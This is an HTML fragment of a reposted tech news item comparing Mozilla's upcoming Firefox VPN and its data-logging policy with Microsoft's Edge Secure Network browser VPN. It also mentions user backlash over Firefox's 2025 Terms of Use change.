		<figure id="5af07d68-2013-4f77-b8c2-b623955e8310">
			<blockquote class="QuoteNewsStyle">
				<p>
					Logs linked to your account are automatically deleted after 3 months. Importantly, Firefox VPN never logs the websites you visit or the content of your communications. For long-term planning, Mozilla keeps overall bandwidth statistics, but these are aggregated across all users and cannot be traced back to you.
				</p>
			</blockquote>
		</figure>

		<p id="c1dbea83-ac1f-468a-8704-6f171b477c66">
			Mozilla has been a popular browser for years, and it has a reputation for being secure and user-friendly. The sentiment among users, however, changed recently after a March 2025 <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/browsing/firefox-users-slam-mozilla-over-controversial-data-privacy-update" href="https://www.windowscentral.com/software-apps/browsing/firefox-users-slam-mozilla-over-controversial-data-privacy-update" rel="external nofollow" target="_blank">update to data privacy in Firefox's Terms of Use</a>.
		</p>

		<p>
			 
		</p>

		<p>
			The new terms suggested that Mozilla had a right to leverage user data in ways that would seriously damage its data privacy reputation. Mozilla was quick to update the ToU with clearer wording, and Firefox VP Ajit Varma was quoted as saying:
		</p>

		<p>
			 
		</p>

		<p style="margin-left: 40px;">
			"<em>Mozilla doesn’t sell data about you (in the way that most people think about ‘selling data’), and we don’t buy data about you. We changed our language because some jurisdictions define ‘sell’ more broadly than most people would usually understand that word."</em>
		</p>

		<h2 id="edge-has-had-a-built-in-vpn-since-2023-how-does-firefox-vpn-compare-3">
			Edge has had a built-in VPN since 2023 — how does Firefox VPN compare?
		</h2>

		<div>
			<div>
				<p>
					<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-320-80.jpg.webp 320w" type="image/webp"> <img alt="Microsoft Edge Secure Network" class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-1024-80.jpg"> </source></picture>
				</p>

				<p>
					<em><span>A look at the control panel for Edge Secure Network VPN. </span><span itemprop="copyrightHolder">(Image credit: Future)</span></em>
				</p>

				<p>
					 
				</p>

				<p id="5039e25a-b022-4d88-ae65-18d93e3b2b6e">
					Much like the new Firefox VPN, <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/microsoft-edge-will-soon-support-browsing-vpn-encryption" href="https://www.windowscentral.com/microsoft-edge-will-soon-support-browsing-vpn-encryption" rel="external nofollow"><strong>Microsoft's Edge Secure Network</strong></a> is a VPN designed to protect web traffic originating in the browser only. It began rolling out in 2022 for Windows 11 and Windows 10 and remains available today.
				</p>

				<p>
					 
				</p>

				<p>
					Edge Secure Network is, of course, only available in Edge, but it's free for anyone who signs in to the browser using a personal Microsoft account. <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/browsing/microsoft-edge-vpn-gets-massive-increase-for-monthly-data" href="https://www.windowscentral.com/software-apps/browsing/microsoft-edge-vpn-gets-massive-increase-for-monthly-data" rel="external nofollow" target="_blank">Users get 5GB of free data per month</a>, up from the 1GB data allowance at launch.
				</p>

				<p>
					 
				</p>

				<p>
					Edge Secure Network has some intelligent settings that can help manage data usage. The default "Optimized" setting automatically enables the VPN if you're connected to public Wi-Fi (or other unsecured networks) or when you visit a site without proper certification.
				</p>

				<p>
					 
				</p>

				<p>
					You can also set Edge Secure Network to run a VPN on all sites, or you can set a custom list of sites on which you'd like the VPN to work. Like Firefox VPN, Edge only collects some diagnostic and support data, which is deleted every 25 hours.
				</p>

				<p>
					 
				</p>

				<p>
					Overall, Edge Secure Network is essentially the same as Firefox VPN, albeit with some data restrictions. It will be interesting to see if Mozilla places a similar data limit on Firefox VPN once it arrives for all users.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/software-apps/firefox-vpn-testing-edge-secure-network" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Friday 17 October 2025 at 4:12 am AEST (my time).</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
				</p>

				<p>
					<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
				</p>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">31924</guid><pubDate>Thu, 16 Oct 2025 18:16:47 +0000</pubDate></item></channel></rss>
